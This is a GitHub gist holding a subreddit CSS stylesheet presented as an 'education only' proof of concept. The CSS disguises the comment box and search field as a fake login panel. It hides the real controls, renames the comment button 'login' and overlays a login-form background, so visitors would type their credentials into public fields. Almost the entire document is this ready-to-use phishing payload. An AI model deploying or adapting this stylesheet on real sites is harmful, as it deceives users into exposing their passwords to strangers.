Skip to content

Instantly share code, notes, and snippets.

@Mackaber
Created May 11, 2016 23:00
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Mackaber/271a9e203692e801f235da8702a86f50 to your computer and use it in GitHub Desktop.
Save Mackaber/271a9e203692e801f235da8702a86f50 to your computer and use it in GitHub Desktop.
/* THIS IS ONLY A PROOF OF CONCEPT PLEASE DON'T USE IT FOR EVIL,
I'M NOT RESPONSIBLE FOR YOUR ACTIONS, THIS IS ONLY FOR EDUCATION
PURPOSES ONLY!!!!*/
.usertext-buttons button {
font-size: 0px;
right: 0px;
top: 33px;
width: 44px;
position: absolute;
}
.usertext-buttons button:after {
content: "login";
font-size: 11px;
}
.help-toggle.toggle a.option.active {
display:none;
}
.sponsorshipbox {
margin-top: 80px;
}
.reddiquette {
display:none!important;
}
.commentarea .usertext-edit.md-container textarea:focus {
background: #FFF;
}
.commentarea .usertext-edit.md-container textarea {
background: transparent;
width: 137px;
position: relative;
left: 150px;
top: 2px;
height: 21px;
resize: none;
margin: 0px;
height: 15px;
width: 128px;
font: 0 Impact;
padding-left: 8px;
text-shadow: black -1px -1px 1px,black -1px 1px 1px,black 1px -1px 1px,black 1px 1px 1px,black 0px 0px 1px,black 0px 0px 0px,black -1px 0px 2px;
font-size: 7px;
font-weight: 900;
font-family: monospace;
text-transform: uppercase;
letter-spacing: 8px;
padding-top: 8px;
}
.commentarea form.usertext.cloneable.warn-on-unload .usertext-edit.md-container {
position: absolute!important;
right: 7px!important;
background: url(%%login%%)!important;
width: 296px!important;
height: 69px;
background-size: 298px!important;
top: 155px;
}
#search input[type=submit] {
display:none!Important;
}
#searchexpando, #moresearchinfo {
white-space: normal;
display: none!important;
}
/* all */
[name=q]::-webkit-input-placeholder { color:rgba(0, 0, 0, 0); }
[name=q]:-moz-placeholder { color:rgba(0, 0, 0, 0); }
[name=q]:-ms-placeholder { color:rgba(0, 0, 0, 0); }
[name=q]::-ms-input-placeholder { color:rgba(0, 0, 0, 0); }
[name=q]:-ms-input-placeholder { color:rgba(0, 0, 0, 0); }
[name=q] {
top: 167px;
background: transparent;
background-size: 160px!important;
background-position-y: 24px!important;
width: 139px!important;
height: 27px!important;
background-blend-mode: darken!important;
border-bottom-color: rgb(153,153,153)!important;
border-bottom-style: solid!important;
border-bottom-width: 1px!important;
border-image-outset: 0px!important;
border-image-repeat: stretch!important;
border-image-slice: 100%!important;
border-image-source: none!important;
border-image-width: 1!important;
border-left-color: rgb(153,153,153)!important;
border-left-style: solid!important;
border-left-width: 1px!important;
border-right-color: rgb(153,153,153)!important;
border-right-style: solid!important;
border-right-width: 1px!important;
border-top-color: rgb(153,153,153)!important;
border-top-style: solid!important;
border-top-width: 1px!important;
right: 159px;
/* height: 81px!important; */
position: absolute;
z-index: 1;
}
[name=q]:focus {
background: #FFF!important;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment